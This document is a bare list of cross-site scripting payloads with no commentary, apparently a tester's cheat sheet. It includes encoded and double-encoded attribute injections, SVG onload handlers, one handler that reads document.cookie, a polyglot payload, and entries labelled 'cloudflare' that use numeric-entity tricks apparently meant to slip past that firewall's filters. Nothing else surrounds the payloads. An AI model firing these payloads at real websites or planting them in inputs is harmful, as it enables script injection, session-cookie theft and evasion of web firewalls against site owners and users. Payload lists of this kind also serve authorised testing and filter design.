hello%22%3E%3Cscript%3Ealert(1)%3C/script%3E
<svg/svg/svg/On/OnLoAd=confirm(document.cookie)><!--
<svg/On/OnLoAd=confirm(1)><!--
"</h1><<!--xss-->script>alert(1)</script><!--
"><SVG ONMOUSEOVER=ALERT(1)>
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527 : Double Encoding
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
%2522 onmouseover=alert(1)

minnalmurali"</h1><!--

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

cloudflare
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>

"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
On\u01234\load ----> On\u01234\+OnLoAd ----> onload
